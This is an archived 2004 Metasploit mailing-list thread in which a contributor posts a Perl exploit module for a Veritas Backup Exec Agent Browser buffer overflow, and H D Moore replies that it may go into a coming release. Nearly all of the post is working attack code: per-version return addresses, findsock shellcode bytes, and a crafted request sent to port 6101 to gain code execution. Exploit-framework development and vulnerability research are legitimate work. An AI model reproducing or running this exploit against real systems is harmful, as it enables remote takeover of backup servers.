Metasploit mailing list archives

Veritas Backup Exec Agent Browser Overflow

From: hdm at metasploit.com (H D Moore)
Date: Thu, 16 Dec 2004 15:14:14 -0600

Thanks! We should be able to include this in the 2.3 release (due out 
sometime early January).

-HD

On Thursday 16 December 2004 15:10, syscall wrote:

http://www.idefense.com/application/poi/display?id=169

exploit code for veritas buggy.

___________________________________

package Msf::Exploit::backupexec_ns;
use base "Msf::Exploit";
use strict;
use Pex::Text;

# wot is this?
my $advanced = { };

# infoz
my $info =
{
    'Name'  => 'Veritas Backup Exec Agent Browser Overflow',
    'Authors' => [ 'Thor Doomen <syscall at inbox.lv>' ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32' ],
    'Priv'  => 1,
    'UserOpts'  => {
                    'RHOST' => [1, 'ADDR', 'The target address'],
                    'RPORT' => [1, 'PORT', 'The target port', 6101],
                },

    'Payload' => {
                 'MinNops'   => 0,
                 'MaxNops'   => 0,
                 'Space'     => 1024,
                 'BadChars'  => '',
                 },

    'Description'  => Pex::Text::Freeform(qq{
Veritas overflow bug.
    }),

    'Refs'    => [
'http://www.idefense.com/application/poi/display?id=169&apos; ], 'Targets'
=> [
                   ['Veritas BE 9.1 ', 0x014476eb, 0x401150FF], #
recv at bnetns.exe v9.1.4691.0 | esi at beclass.dll v9.1.4691.0
                   ['Veritas BE 8.5 ', 0x014308b9, 0x401138FF], #
recv at bnetns.exe v8.50.3572  | esi at beclass.dll v8.50.3572
                 ],
};

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' =>
$advanced}, @_); return($self);
}

sub Exploit {
    my $self        = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target      = $self->Targets->[$target_idx];

    $self->PrintLine( "[*] Attempting to make exploit target " .
$target->[0] );

    my $s = Msf::Socket::Tcp->new(
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );

    if ( $s->IsError ) {
        $self->PrintLine( '[*] Error creating socket: ' . $s->GetError
); return;
    }

    my $code = "\xfc" x 112;

    # findsock - recv!bnetns.exe (iat)
    my $read =
       
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" .
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" .
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75" .
"\xe1\xff\xd7";

    substr( $read, 29, 4, pack( 'V', $target->[2] ) );
    substr( $code, 2, length($read), $read );
    substr( $code, 66, 4, pack( 'V', $target->[1] ) );

    my $req =
        "\x02\x00\x32\x00\x20\x00" . $code . "\x00"
      . "1.1.1.1.1.1\x00"
      . "\xeb\x81";

    $self->PrintLine( "[*] Sending attack of " . length($req) . "
bytes..." ); $s->Send($req);

    $self->PrintLine("[*] Sending the shell code...");

    # make socket flush
    $s->Send( "pPpP" x 128 );

    $s->Send($shellcode);

    $self->PrintLine("[*] Wait for response...");

    return;
}

Advertisement:

     Skoda Fabia
auto bez pirmas iemaksas
    www.skoda.lv

Current thread:

Veritas Backup Exec Agent Browser Overflow syscall (Dec 16)
- Veritas Backup Exec Agent Browser Overflow H D Moore (Dec 16)